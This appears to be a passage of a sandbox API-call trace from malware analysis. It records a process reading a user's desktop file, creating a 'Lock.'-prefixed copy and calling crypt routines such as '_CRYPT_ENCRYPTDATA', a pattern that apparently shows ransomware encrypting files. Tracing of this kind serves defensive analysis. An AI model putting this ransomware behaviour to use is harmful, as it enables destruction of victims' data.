dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0151.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0151.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0151.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0151.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0151.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0151.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0151.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0151.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0151.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0151.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0151.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0151.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0151.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0151.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0151.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0151.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0151.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0151.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0151.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0151.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0151.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0151.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0151.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0151.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0151.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0151.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0151.229] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0151.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0151.229] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.229] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.229] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.231] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/F Elbom0O1NrT.swf" (normalized: "c:\\users\\fd1hvy\\desktop\\f elbom0o1nrt.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0151.231] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.231] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0151.232] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.232] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.232] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.232] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0151.232] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.F Elbom0O1NrT.swf" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.f elbom0o1nrt.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0151.340] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.341] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.341] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.341] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.344] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0151.344] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x9904, lpOverlapped=0x0) returned 1 [0151.347] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0151.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0151.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0151.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0151.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0151.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x9904) returned 0x3bf0050 [0151.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3de3020 | out: hHeap=0x970000) returned 1 [0151.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0151.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0151.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0151.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0151.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0151.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0151.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0151.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0151.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x9904) returned 0x2f14010 [0151.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0050 | out: hHeap=0x970000) returned 1 [0151.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0151.547] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0151.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0151.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0151.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0151.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0151.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x9904) returned 0x3bf0050 [0151.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0151.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0050 | out: hHeap=0x970000) returned 1 [0151.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0151.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0151.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0151.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0151.549] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0151.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0151.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0151.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0151.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0151.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0151.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0151.550] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0151.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fea0 [0151.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0151.550] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0151.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fea0 | out: hHeap=0x970000) returned 1 [0151.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0151.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0151.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b48 [0151.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0151.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0151.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0151.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0151.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x9904) returned 0x3bf0050 [0151.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0151.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c98 [0151.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0151.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0151.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0151.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d08 [0151.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0151.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0151.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0151.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cd8 [0151.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0151.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0151.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0151.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505f0 [0151.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0151.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0151.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0151.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0151.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0151.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x9904) returned 0x2f1d920 [0151.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0151.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0151.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0151.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0151.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0151.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0151.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0151.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0151.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0151.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0151.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0151.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0151.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0151.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0151.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0151.555] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0151.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0151.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0151.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0151.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0151.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0151.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0151.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0151.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0151.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0151.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0151.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0151.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0151.556] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0151.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0151.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0151.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0151.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0151.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0151.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0151.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0151.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0151.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0151.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0151.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0151.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0151.556] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0151.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0151.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0151.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0151.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0151.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0151.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0151.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0151.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0151.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0151.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0151.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0151.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0151.557] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0151.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0151.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0151.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0151.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0151.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0151.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0151.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0151.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0151.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0151.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0151.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0151.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0151.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0151.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0151.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0151.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0151.558] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0151.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0151.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0151.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0151.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0151.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0151.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0151.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0151.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0151.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0151.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0151.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0151.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0151.558] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0151.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0151.558] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0151.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0151.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0151.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50890 [0151.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0151.559] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0151.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0151.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0151.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0151.559] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0151.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0151.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0151.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50968 [0151.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0151.559] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0151.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0151.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0151.559] HeapFree (in: 